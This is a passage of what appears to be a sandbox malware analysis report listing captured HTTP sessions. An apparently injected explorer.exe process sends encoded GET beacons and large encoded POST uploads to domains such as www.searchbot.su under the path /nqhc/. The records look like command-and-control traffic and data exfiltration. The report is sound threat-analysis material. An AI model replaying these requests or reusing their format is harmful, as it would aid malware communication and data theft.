                                                                                                                                                                          Dec 5, 2022 15:17:55.356389046 CET12194OUTData Raw: 69 4c 72 46 42 6f 69 66 33 2d 78 77 6c 2d 6e 4c 54 78 36 35 4c 50 50 31 48 30 57 42 64 56 48 45 4d 37 6f 55 69 53 76 69 41 38 5a 49 43 53 66 37 4f 37 46 41 6f 43 43 44 56 61 79 5a 4a 43 52 72 68 35 6b 6d 38 62 78 47 6b 56 6c 56 52 64 48 6a 33 57
                                                                                                                                                                          Data Ascii: iLrFBoif3-xwl-nLTx65LPP1H0WBdVHEM7oUiSviA8ZICSf7O7FAoCCDVayZJCRrh5km8bxGkVlVRdHj3Wyr(VmNo6HFDX6CGYW2zWgLFrrpyULq~910PwI2wrdB6CrIbGxrSqp0Y9UHTFvN5Xt07gqqd42JsSeFNP0YyIBXhx4PMMnLGXBoCOzG6EL-s87fv0tXX3Jvs7hkQZ(eH8EsSYDQV8mu7Q5Y0DXed-dcP5AhG44o8s7
                                                                                                                                                                          Dec 5, 2022 15:17:55.356478930 CET12199OUTData Raw: 4c 55 62 6a 28 78 6d 72 64 55 69 36 70 42 44 49 53 43 4a 6d 73 72 55 4f 47 51 32 6e 6b 32 49 35 36 52 48 55 33 37 4c 58 47 4f 4d 58 28 59 66 41 30 57 55 55 47 46 37 75 6e 48 65 5a 58 32 37 42 6d 73 38 55 5a 71 46 4d 62 71 78 63 54 36 4f 62 63 6d
                                                                                                                                                                          Data Ascii: LUbj(xmrdUi6pBDISCJmsrUOGQ2nk2I56RHU37LXGOMX(YfA0WUUGF7unHeZX27Bms8UZqFMbqxcT6ObcmPemPveQOIZYyUCC-6M3U1hKb41N3fhS9gceThyUa~pg6SAVdm8UqA0Dp(weyKRUv4VCx1eP1tJX5TuwdEBjulQm5j-1nMvi0zOWNdHr6dFBW9eDgbeu1VS8WLJZC2uFxA0La(hBL~0ML0NkmmlY_o3pkT35CWQtlP
                                                                                                                                                                          Dec 5, 2022 15:17:55.356574059 CET12201OUTData Raw: 68 65 63 33 69 4b 31 76 36 56 66 4f 5a 63 59 67 36 78 53 56 74 6b 63 39 6d 4d 62 52 42 6e 32 30 4a 77 6d 4f 5a 61 69 36 45 66 75 6c 33 55 4e 61 48 4c 74 30 4f 66 4f 78 7e 48 57 36 6d 50 32 67 54 63 6a 41 34 44 7a 74 5a 69 4e 43 69 6b 34 7a 52 51
                                                                                                                                                                          Data Ascii: hec3iK1v6VfOZcYg6xSVtkc9mMbRBn20JwmOZai6Eful3UNaHLt0OfOx~HW6mP2gTcjA4DztZiNCik4zRQIHpR(MiJhcO7QeE6NlXoMTRle6qB5xSdkKsFKcZ8NNXU5GfJkcHJBhEOh1Nm3djc9N7lfbADs4ts(I~kfQYc~bY8K2caMX3A5hBzfZ5W(FFYydv4U7hC6tInoSjpt0B9vBZuUMThsSFLu9lIm0AzLog4pzkblGiNI
                                                                                                                                                                          Dec 5, 2022 15:17:55.522764921 CET12206INHTTP/1.1 404 Not Found
                                                                                                                                                                          Date: Mon, 05 Dec 2022 14:17:55 GMT
                                                                                                                                                                          Server: Apache
                                                                                                                                                                          Upgrade: h2,h2c
                                                                                                                                                                          Connection: Upgrade, close
                                                                                                                                                                          Last-Modified: Fri, 01 May 2020 23:50:34 GMT
                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                          Content-Encoding: gzip
                                                                                                                                                                          Content-Length: 462
                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                          Data Raw: 1f 8b 08 00 00 00 00 00 00 03 5d 92 4d 8f d3 30 10 86 ef fd 15 43 38 00 52 dd 8f a5 0b 28 1f 15 17 e0 82 d0 6a 57 70 9f c4 d3 c4 c2 f1 04 7b da a6 ac f6 bf 6f 9c b4 cb b2 f2 c1 f2 78 de 77 9e 19 3b 7f a5 b9 92 53 47 d0 48 6b b7 b3 3c 6e 60 d1 d5 45 42 2e 89 01 42 bd 9d 01 e4 2d 09 42 d5 a0 0f 24 45 b2 97 9d fa 94 fc bb 68 44 3a 45 7f f6 e6 50 24 bd da a3 aa b8 ed 50 4c 69 29 81 8a 9d 90 1b 54 86 0a d2 35 4d 3a 31 62 69 bb 59 6d e0 8b f7 ec f3 e5 14 78 b2 74 d8 52 91 1c 0c 1d 3b f6 f2 cc e5 68 b4 34 85 a6 83 a9 48 8d 87 39 18 67 c4 a0 55 a1 42 4b c5 3a 79 69 e3 b9 64 09 cf 4c 1c 1b a7 a9 9f 83 e3 1d 5b cb c7 49 12 e4 34 31 00 7c 6e 49 1b 84 50 79 22 07 e8 34 bc 6d b1 9f 0a a6 d7 ab 55 d7 bf 83 fb 31 13 a0 64 7d 82 7b d8 0d ee 2a 98 bf 94 c2 e2 03 b5 19 3c c0 98 f0 10 ad 97 67 ef 7c 39 cd 74 96 8f aa 31 5a 24 42 bd 28 b4 a6 76 29 54 03 21 f9 6c 20 8a ba 66 7d c9 19 ed 77 d8 1a 7b 4a e1 1b b1 af 0d ce 21 90 37 bb 6c e8 cc b2 4f e1 f5 06 e3 ca a0 c5 e1 da 29 e1 2e 85 4d 64 b1 c6 91 6a c8 d4 8d a4 b0 5e 5c 67 c9 d4 e7 1d 7b 7f 9a 83 34 26 40 87 35 81 66 0a ee 8d 00 f5 26 c8 22 2f fd f6 c6 12 06 1a 5e 9f aa df 43 22 c1 cf db ef c0 1e 6a 86 12 87 10 8e c2 c5 d8 65 b3 8e b6 23 f8 d5 05 1c e0 3f f4 5f e4 35 ba 88 8e 2e a8 17 fc 1f 75 5c d9 a4 38 9e 71 df af 56 17 dc a7 0f b3 80 9b 48 fb 83 05 be f2 de e9 73 f9 ab b1 7c be 8c c3 8d 43 5e 4e 3f fb 11 21 b9 04 0e ea 02 00 00
                                                                                                                                                                          Data Ascii: ]M0C8R(jWp{oxw;SGHk<n`EB.B-B$EhD:EP$PLi)T5M:1biYmxtR;h4H9gUBK:yidL[I41|nIPy"4mU1d}{*<g|9t1Z$B(v)T!l f}w{J!7lO).Mdj^\g{4&@5f&"/^C"je#?_5.u\8qVHs|C^N?!


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                          54192.168.11.2049898192.232.217.12580C:\Windows\explorer.exe
                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                          Dec 5, 2022 15:17:57.215333939 CET12207OUTGET /nqhc/?7nWHV=cCAegqK/nzfcR22oyFZFZLhv7+fwUp6Akkv27RFimicapgMUJBRfpG+MwKY/yKfw/XeAmq4HqwYY5KwMyaSJSZOUIGIe3VRiGA==&t0D=yFNHS0IX HTTP/1.1
                                                                                                                                                                          Host: www.wellnessprodia.com
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                          Data Ascii:
                                                                                                                                                                          Dec 5, 2022 15:17:57.384748936 CET12208INHTTP/1.1 404 Not Found
                                                                                                                                                                          Date: Mon, 05 Dec 2022 14:17:57 GMT
                                                                                                                                                                          Server: Apache
                                                                                                                                                                          Upgrade: h2,h2c
                                                                                                                                                                          Connection: Upgrade, close
                                                                                                                                                                          Last-Modified: Fri, 01 May 2020 23:50:34 GMT
                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                          Content-Length: 746
                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                          Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 78 2d 75 61 2d 63 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 69 65 3d 65 64 67 65 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 35 30 30 70 78 29 20 7b 0a 20 20 20 20 20 20 62 6f 64 79 20 7b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 2e 36 65 6d 3b 20 7d 20 0a 20 20 20 20 7d 0a 20 20 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 22 3e 0a 0a 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 47 65 6f 72 67 69 61 2c 20 73 65 72 69 66 3b 20 63 6f 6c 6f 72 3a 20 23 34 61 34 61 34 61 3b 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 34 65 6d 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 35 3b 22 3e 0a 20 20 20 20 53 6f 72 72 79 2c 20 74 68 69 73 20 70 61 67 65 20 64 6f 65 73 6e 27 74 20 65 78 69 73 74 2e 3c 62 72 3e 50 6c 65 61 73 65 20 63 68 65 63 6b 20 74 68 65 20 55 52 4c 20 6f 72 20 67 6f 20 62 61 63 6b 20 61 20 70 61 67 65 2e 0a 20 20 3c 2f 68 31 3e 0a 20 20 0a 20 20 3c 68 32 20 73 74 79 6c 65 3d 22 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 63 6f 6c 6f 72 3a 20 23 37 64 37 64 37 64 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 22 3e 0a 20 20 20 20 34 30 34 20 45 72 72 6f 72 2e 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 2e 0a 20 20 3c 2f 68 32 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                          Data Ascii: <!doctype html><html lang="en"><head> <meta charset="utf-8"> <meta http-equiv="x-ua-compatible" content="ie=edge"> <title>404 Error</title> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="robots" content="noindex, nofollow"> <style> @media screen and (max-width:500px) { body { font-size: .6em; } } </style></head><body style="text-align: center;"> <h1 style="font-family: Georgia, serif; color: #4a4a4a; margin-top: 4em; line-height: 1.5;"> Sorry, this page doesn't exist.<br>Please check the URL or go back a page. </h1> <h2 style=" font-family: Verdana, sans-serif; color: #7d7d7d; font-weight: 300;"> 404 Error. Page Not Found. </h2> </body></html>


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                          55192.168.11.2049899198.58.118.16780C:\Windows\explorer.exe
                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                          Dec 5, 2022 15:18:12.482553005 CET12209OUTGET /nqhc/?7nWHV=LdV+lgJdmfuEMP3jUfrE9r0MLHENHMoAvR3n1HnrztGZNsUQ943e3pzfBc8//iPa0aHj65ptHNl5my2qaj9ZRSJvwgLgjYR0TA==&t0D=yFNHS0IX HTTP/1.1
                                                                                                                                                                          Host: www.labour-office.com
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                          Data Ascii:
                                                                                                                                                                          Dec 5, 2022 15:18:12.617708921 CET12209INHTTP/1.1 404 Not Found
                                                                                                                                                                          server: openresty/1.13.6.1
                                                                                                                                                                          date: Mon, 05 Dec 2022 14:18:12 GMT
                                                                                                                                                                          content-type: text/html
                                                                                                                                                                          content-length: 175
                                                                                                                                                                          connection: close
                                                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 33 2e 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>openresty/1.13.6.1</center></body></html>


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                          56192.168.11.204990045.130.41.2480C:\Windows\explorer.exe
                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                          Dec 5, 2022 15:18:17.686798096 CET12210OUTPOST /nqhc/ HTTP/1.1
                                                                                                                                                                          Host: www.searchbot.su
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Content-Length: 187
                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                          Origin: http://www.searchbot.su
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                          Accept: */*
                                                                                                                                                                          Referer: http://www.searchbot.su/nqhc/
                                                                                                                                                                          Accept-Language: en-US
                                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                                          Data Raw: 37 6e 57 48 56 3d 39 6a 5a 50 44 69 71 45 4a 47 6e 31 68 71 50 63 4a 53 4c 33 50 73 74 6f 61 70 61 52 76 30 4b 52 30 70 68 4f 30 4e 45 51 34 4a 4f 38 66 61 6b 44 33 38 6c 38 43 57 66 6c 75 35 6a 6c 28 76 75 52 30 4d 55 62 33 43 72 61 63 63 35 58 47 68 44 33 65 68 6c 39 56 44 66 49 4e 55 43 4b 72 47 31 57 32 69 75 4f 35 5a 45 50 73 61 36 4f 57 50 78 66 77 41 47 37 59 43 48 6a 55 6a 61 31 6d 53 66 35 6c 49 43 67 4f 61 77 36 78 46 32 51 34 7a 38 59 52 69 6d 61 73 4b 31 65 35 63 7a 55 61 56 4d 43 64 6e 5a 52 43 69 30 62 6d 38 39 56 54 50 64 57 56 67 29 2e 00 00 00 00 00 00 00 00
                                                                                                                                                                          Data Ascii: 7nWHV=9jZPDiqEJGn1hqPcJSL3PstoapaRv0KR0phO0NEQ4JO8fakD38l8CWflu5jl(vuR0MUb3Cracc5XGhD3ehl9VDfINUCKrG1W2iuO5ZEPsa6OWPxfwAG7YCHjUja1mSf5lICgOaw6xF2Q4z8YRimasK1e5czUaVMCdnZRCi0bm89VTPdWVg).
                                                                                                                                                                          Dec 5, 2022 15:18:17.779515028 CET12211INHTTP/1.1 404 Not Found
                                                                                                                                                                          Server: nginx-reuseport/1.21.1
                                                                                                                                                                          Date: Mon, 05 Dec 2022 14:18:17 GMT
                                                                                                                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                          Content-Encoding: gzip
                                                                                                                                                                          Data Raw: 65 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4d 8f c1 6a c3 30 10 44 ef fe 8a 6d 4e cd a1 5a 27 b8 d0 83 10 b4 b1 43 03 4e 6a 1a f9 90 a3 12 6d 90 21 b1 5c 49 ae db bf af ec 50 c8 65 61 76 df 0e 33 fc 21 ff 58 c9 43 55 c0 bb dc 96 50 d5 6f e5 66 05 b3 27 c4 4d 21 d7 88 b9 cc 6f 97 25 4b 11 8b dd 4c 24 dc 84 eb 45 70 43 4a 47 11 9a 70 21 91 a5 19 ec 6c 80 b5 ed 5b cd f1 b6 4c 38 4e 10 3f 5a fd 3b fe 2d c4 1d 13 55 c2 3b 21 0d 81 a3 af 9e 7c 20 0d f5 67 09 83 f2 d0 46 ee 3c 72 60 5b 08 a6 f1 e0 c9 7d 93 63 1c bb d1 c9 c5 a1 b4 76 e4 bd 78 ed d4 c9 10 2e 59 c6 9e 17 f0 58 b7 cd cf 1c f6 13 0e 2a c0 30 0c cc 93 72 27 73 b4 81 f9 1e 2a eb 02 bc a4 1c ff 0d 62 ce 29 61 cc 34 36 4b fe 00 08 94 dc 0d 14 01 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                          Data Ascii: e9Mj0DmNZ'CNjm!\IPeav3!XCUPof'M!o%KL$EpCJGp!l[L8N?Z;-U;!| gF<r`[}cvx.YX*0r's*b)a46K0


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                          57192.168.11.204990145.130.41.2480C:\Windows\explorer.exe
                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                          Dec 5, 2022 15:18:19.764832973 CET12212OUTPOST /nqhc/ HTTP/1.1
                                                                                                                                                                          Host: www.searchbot.su
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Content-Length: 527
                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                          Origin: http://www.searchbot.su
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                          Accept: */*
                                                                                                                                                                          Referer: http://www.searchbot.su/nqhc/
                                                                                                                                                                          Accept-Language: en-US
                                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                                          Data Raw: 37 6e 57 48 56 3d 39 6a 5a 50 44 69 71 45 4a 47 6e 31 77 35 58 63 4b 78 6a 33 4a 4d 74 72 55 4a 61 52 6c 55 4b 56 30 70 74 4f 30 50 6f 36 35 37 71 38 66 37 30 44 6d 49 4a 38 44 57 66 6c 32 4a 69 76 37 76 75 4b 30 4e 6f 54 33 48 4c 61 63 59 70 58 48 53 4c 33 4a 68 6c 2d 42 54 66 4a 49 55 43 61 36 57 31 51 32 69 79 6f 35 59 51 50 73 4f 4b 4f 45 36 74 66 36 78 47 36 63 69 48 6c 57 6a 61 79 73 79 66 4e 6c 49 47 6f 4f 61 34 4d 78 32 71 51 34 54 63 59 44 69 6d 5a 6d 36 31 6e 37 63 79 46 4c 58 45 49 59 45 5a 79 55 77 73 34 7e 75 46 42 56 4d 34 5a 58 66 38 5f 50 32 32 6b 56 4c 50 52 6e 55 35 48 4f 54 48 65 51 6c 35 65 59 4c 76 58 4b 36 62 30 55 50 55 46 6d 7a 65 36 4f 33 33 74 47 43 73 6e 56 48 73 30 6f 76 71 30 6c 6d 78 4b 5a 36 71 38 67 72 6d 37 58 6b 30 46 54 6d 6a 6b 77 79 59 61 39 55 6f 54 71 78 44 73 50 6d 71 46 47 79 5a 48 66 6d 30 76 51 72 44 42 61 52 4c 2d 52 6e 56 30 78 31 53 53 50 71 32 77 62 67 4c 44 53 2d 34 44 55 43 6a 66 69 4c 7a 44 78 45 34 55 7a 58 39 44 4a 71 47 48 4a 4d 37 78 62 44 68 77 54 61 57 59 61 41 6f 48 63 36 78 34 33 4c 7e 69 6d 59 7a 79 73 4e 45 70 6c 4c 6b 67 78 6f 4e 61 36 5f 62 65 71 33 31 6f 74 43 6b 78 65 75 32 69 6e 6d 78 69 6e 72 56 67 48 72 35 7a 34 70 74 6e 54 67 4a 45 6d 61 78 75 37 36 47 56 44 31 39 49 68 61 42 7a 5a 64 7a 58 6b 42 34 5a 7a 47 54 57 4b 76 79 5f 28 37 72 67 65 49 4a 62 44 78 42 51 77 72 46 72 50 7a 76 33 4d 31 46 4d 39 76 50 35 55 4f 69 76 79 2d 65 32 33 31 47 6d 44 46 4a 48 6b 6d 76 56 63 70 4a 46 71 4c 69 31 69 50 4a 76 45 36 53 74 4d 51 43 4e 72 69 38 5f 4e 79 56 6a 74 39 63 66 54 73 6f 57 64 68 6f 2e 00 00 00 00 00 00 00 00
                                                                                                                                                                          Data Ascii: 7nWHV=9jZPDiqEJGn1w5XcKxj3JMtrUJaRlUKV0ptO0Po657q8f70DmIJ8DWfl2Jiv7vuK0NoT3HLacYpXHSL3Jhl-BTfJIUCa6W1Q2iyo5YQPsOKOE6tf6xG6ciHlWjaysyfNlIGoOa4Mx2qQ4TcYDimZm61n7cyFLXEIYEZyUws4~uFBVM4ZXf8_P22kVLPRnU5HOTHeQl5eYLvXK6b0UPUFmze6O33tGCsnVHs0ovq0lmxKZ6q8grm7Xk0FTmjkwyYa9UoTqxDsPmqFGyZHfm0vQrDBaRL-RnV0x1SSPq2wbgLDS-4DUCjfiLzDxE4UzX9DJqGHJM7xbDhwTaWYaAoHc6x43L~imYzysNEplLkgxoNa6_beq31otCkxeu2inmxinrVgHr5z4ptnTgJEmaxu76GVD19IhaBzZdzXkB4ZzGTWKvy_(7rgeIJbDxBQwrFrPzv3M1FM9vP5UOivy-e231GmDFJHkmvVcpJFqLi1iPJvE6StMQCNri8_NyVjt9cfTsoWdho.
                                                                                                                                                                          Dec 5, 2022 15:18:20.609693050 CET12213INHTTP/1.1 404 Not Found
                                                                                                                                                                          Server: nginx-reuseport/1.21.1
                                                                                                                                                                          Date: Mon, 05 Dec 2022 14:18:20 GMT
                                                                                                                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                          Content-Encoding: gzip
                                                                                                                                                                          Data Raw: 65 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4d 8f c1 6a c3 30 10 44 ef fe 8a 6d 4e cd a1 5a 27 b8 d0 83 10 b4 b1 43 03 4e 6a 1a f9 90 a3 12 6d 90 21 b1 5c 49 ae db bf af ec 50 c8 65 61 76 df 0e 33 fc 21 ff 58 c9 43 55 c0 bb dc 96 50 d5 6f e5 66 05 b3 27 c4 4d 21 d7 88 b9 cc 6f 97 25 4b 11 8b dd 4c 24 dc 84 eb 45 70 43 4a 47 11 9a 70 21 91 a5 19 ec 6c 80 b5 ed 5b cd f1 b6 4c 38 4e 10 3f 5a fd 3b fe 2d c4 1d 13 55 c2 3b 21 0d 81 a3 af 9e 7c 20 0d f5 67 09 83 f2 d0 46 ee 3c 72 60 5b 08 a6 f1 e0 c9 7d 93 63 1c bb d1 c9 c5 a1 b4 76 e4 bd 78 ed d4 c9 10 2e 59 c6 9e 17 f0 58 b7 cd cf 1c f6 13 0e 2a c0 30 0c cc 93 72 27 73 b4 81 f9 1e 2a eb 02 bc a4 1c ff 0d 62 ce 29 61 cc 34 36 4b fe 00 08 94 dc 0d 14 01 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                          Data Ascii: e9Mj0DmNZ'CNjm!\IPeav3!XCUPof'M!o%KL$EpCJGp!l[L8N?Z;-U;!| gF<r`[}cvx.YX*0r's*b)a46K0


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                          58192.168.11.204990345.130.41.2480C:\Windows\explorer.exe
                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                          Dec 5, 2022 15:18:21.838819027 CET12225OUTPOST /nqhc/ HTTP/1.1
                                                                                                                                                                          Host: www.searchbot.su
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Content-Length: 51815
                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                          Origin: http://www.searchbot.su
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                          Accept: */*
                                                                                                                                                                          Referer: http://www.searchbot.su/nqhc/
                                                                                                                                                                          Accept-Language: en-US
                                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                                          Data Raw: 37 6e 57 48 56 3d 39 6a 5a 50 44 69 71 45 4a 47 6e 31 77 35 58 63 4b 78 6a 33 4a 4d 74 72 55 4a 61 52 6c 55 4b 56 30 70 74 4f 30 50 6f 36 35 37 69 38 66 4d 30 44 33 5a 4a 38 41 57 66 6c 37 70 69 75 37 76 75 48 30 4d 41 58 33 48 50 4b 63 61 68 58 48 44 62 33 4a 30 35 2d 52 44 65 75 52 55 43 4c 72 47 31 4d 32 69 75 47 35 59 45 66 73 65 57 4f 57 4e 70 66 77 69 75 37 65 79 48 6a 57 6a 61 6d 6f 79 66 46 6c 49 4c 7a 4f 61 30 4d 78 31 65 51 34 6c 51 59 51 44 6d 5a 67 71 31 67 77 38 7a 4c 53 6e 46 34 59 45 4e 4d 55 77 73 47 7e 76 42 42 56 50 77 5a 46 75 38 77 50 57 32 6b 59 72 50 53 6a 55 31 44 4f 54 61 44 51 6c 4e 65 59 49 76 58 4c 61 62 30 45 37 41 47 75 7a 65 38 59 48 33 36 43 43 6f 5f 56 48 6f 4b 6f 72 6d 30 6c 57 31 4b 59 4a 43 38 6a 50 79 37 51 30 30 4c 65 47 6a 37 6e 69 59 47 39 55 35 36 71 79 36 5a 50 6d 4f 46 48 54 35 48 61 43 59 6f 57 4c 44 44 45 42 4c 6e 44 58 5a 47 78 31 43 65 50 71 32 67 62 6a 48 44 54 4f 49 44 56 44 6a 63 6c 62 7a 45 38 6b 35 63 34 33 42 65 4a 71 61 66 4a 4d 69 71 62 41 4e 77 54 36 57 59 66 6a 41 45 4f 71 78 7a 6f 37 28 6c 6f 34 7a 6c 73 4e 59 31 6c 4b 77 57 77 5a 52 61 34 4f 72 65 74 6e 31 70 70 69 6b 31 48 2d 32 6b 6a 6d 78 69 6e 72 5a 4b 48 72 6c 7a 37 5a 6c 6e 4a 79 68 45 74 74 6c 75 39 36 47 54 44 31 39 6a 68 61 64 49 5a 64 37 70 6b 46 38 5f 7a 46 28 57 4b 65 69 5f 38 35 54 6e 61 34 4a 55 55 68 42 35 39 4b 35 47 50 31 4b 36 4d 31 55 37 7e 59 33 35 53 39 4b 76 6a 75 65 31 6c 46 47 72 45 46 49 45 67 6d 6a 67 63 71 38 79 71 4b 57 63 69 4a 70 76 55 75 44 51 4a 42 7a 61 78 6b 6f 6a 4e 79 46 52 6b 50 41 44 57 76 41 4c 4f 42 45 44 74 6f 44 65 4c 62 43 67 53 6c 71 6c 6b 4e 6f 37 67 44 57 43 70 49 77 36 49 51 6b 7a 68 75 43 61 33 5a 4b 6f 6c 68 4b 41 30 62 36 67 65 70 77 78 39 75 38 31 6a 4e 46 4c 6e 69 41 6c 39 47 57 52 4e 49 6b 4a 76 53 57 37 61 5f 43 52 48 58 79 65 79 55 42 66 38 5a 46 6f 54 67 70 4d 49 79 6f 76 50 4f 63 42 64 32 4f 42 6c 6b 4a 55 77 4a 66 70 59 59 49 6b 52 62 74 4a 53 7a 56 49 41 72 5a 4e 59 58 79 37 49 66 4c 71 32 42 36 66 48 41 59 41 37 70 56 6d 30 36 46 47 7a 79 55 41 75 58 34 4e 7e 35 63 61 30 49 4c 34 49 73 7a 4d 56 38 46 43 61 57 66 56 28 54 51 51 6d 58 6f 41 74 61 49 75 31 4f 44 4a 34 57 30 5f 6c 59 57 51 49 52 6d 69 4a 32 68 34 70 45 38 66 65 47 66 6d 4c 76 36 49 78 64 38 63 4a 71 74 4b 4e 73 6f 38 49 75 6f 66 6b 77 68 4e 4b 6c 7a 4d 32 58 6a 32 48 57 43 58 48 57 36 4d 64 75 6d 75 71 30 4b 64 7a 4f 70 43 73 37 45 4d 68 75 74 6f 61 57 68 57 70 4e 4e 35 62 47 70 71 7e 42 4d 56 52 35 4e 47 69 52 45 48 65 35 71 6f 6e 38 7e 59 55 67 53 50 61 62 37 47 4a 4a 34 61 67 47 64 66 78 75 6a 68 59 59 37 59 4a 78 52 38 46 35 42 72 5a 53 46 79 76 77 68 55 6a 6d 7a 6a 43 71 28 4a 30 65 57 67 4b 6c 71 69 58 46 41 74 69 79 28 75 78 63 31 31 4a 72 33 6e 54 61 75 61 68 58 74 53 62 30 4c 52 51 4b 4c 78 43 39 6f 37 28 59 6e 78 58 6f 74 64 52 38 71 33 62 63 67 62 72 42 6b 77 66 4e 79 59 56 6a 52 73 35 63 4f 55 50 59 75 58 46 58 7e 6d 57 41 6b 4a 6f 55 44 4f 61 68 38 4e 46 54 71 56 6b 45 5a 6f 73 5f 61 74 41 54 63 61 74 67 43 55 7e 30 51 37 55 51 55 4e 4e 35 6a 42 46 56 39 43 51 58 4d 6d 64 44 67 71 4d 37 59 32 43 53 6c 7a 49 73 42 62 36 61 54 79 4f 53 33 69 47 51 4c 71 6e 4b 63 4b 4a 51 73 45 4b 4f 4d 